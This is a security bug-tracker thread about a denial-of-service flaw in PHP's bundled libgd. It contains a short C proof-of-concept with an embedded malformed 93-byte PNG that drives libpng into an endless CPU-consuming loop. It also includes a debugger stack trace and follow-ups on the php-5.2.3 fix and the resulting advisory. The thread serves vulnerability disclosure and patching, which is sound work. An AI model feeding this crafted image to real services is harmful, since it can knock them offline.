php includes a local libgd copy. +++ This bug was initially created as a clone of Bug #179154 +++ The following test case using libgd 2.0.34 apparently leads to an infinite loop in the libpng decoder. The infinite loop seems to occur between the libpng code (png_read_data()) and the libgd callback (gdPngReadData()) which may not properly detect truncated input. The libpng’s png_read_info() function hence never returns, and the library consumme 100% CPU. /* id: gdbad3.c, Xavier Roche, May. 2007 */ /* gcc gdbad3.c -o bad -lgd && ./bad */ #include <stdio.h> #include <stdlib.h> #include "gd.h" static const unsigned char pngdata[93]; int main(void) { gdImagePtr im; if ( ( im = gdImageCreateFromPngPtr(93, (char*) &pngdata[0]) ) != NULL) { fprintf(stderr, "success!\n"); gdImageDestroy(im); } else { fprintf(stderr, "failed!\n"); } return 0; } /* PNG data */ static const unsigned char pngdata[93] = {137,80,78,71,13,10,26,10,0,0, 0,13,73,72,68,82,0,0,0,120,0,0,0,131,8,6,0,0,0,70,49,223,8,0,0,0,6,98, 75,71,68,0,255,0,255,0,255,160,189,167,147,0,0,0,9,112,72,89,115,0,0,92, 70,0,0,92,70,1,20,148,67,65,0,0,0,9,118,112,65,103,0,0,0,120,0,0,0,131, 0,226,13,249,45}; Typical stack: (gdb) where #0 gdPngReadData (png_ptr=0x501090, data=0x501570 "", length=5247120) at gd_png.c:83 #1 0x00002af9ef5ab192 in png_read_data (png_ptr=0x501090, data=0x501570 "", length=9) at pngrio.c:33 #2 0x00002af9ef5a1935 in png_crc_read (png_ptr=0x501090, buf=0x501570 "", length=9) at pngrutil.c:96 #3 0x00002af9ef5a1a17 in png_crc_finish (png_ptr=0x501090, skip=5248368) at pngrutil.c:116 #4 0x00002af9ef5a425a in png_handle_unknown (png_ptr=0x501090, info_ptr=0x505ae0, length=9) at pngrutil.c:2221 #5 0x00002af9ef5a9e0d in png_read_info (png_ptr=0x501090, info_ptr=0x505ae0) at pngread.c:530 #6 0x00002af9eeb2baf9 in gdImageCreateFromPngCtx (infile=0x501010) at gd_png.c:189 #7 0x00002af9eeb2b9b0 in gdImageCreateFromPngPtr (size=5247120, data=0x501570) at gd_png.c:111 #8 0x00000000004006df in main () (if you ‘up’ to png_read_info() and try ‘finish’, you’ll see that this function never returns due to endless calls to gdPngReadData())
php please advise.
JFYI: This bug has been fixed in >=php-5.2.3 (see http://www.php.net/releases/5_2_3.php); this version of php is only available in the php overlay atm.
php, what's the status here?
Same as with http://bugs.gentoo.org/180556 -- will be fixed once >=php-5.2.3-r2 from the overlay gets merged into the tree.
afaict php-5.2.3-r3 seems stable on all security supported arches, so ready for glsa. maybe we could mention this issue as part of the GD draft. security, please comment.
GLSA 200710-02, sorry for the delay.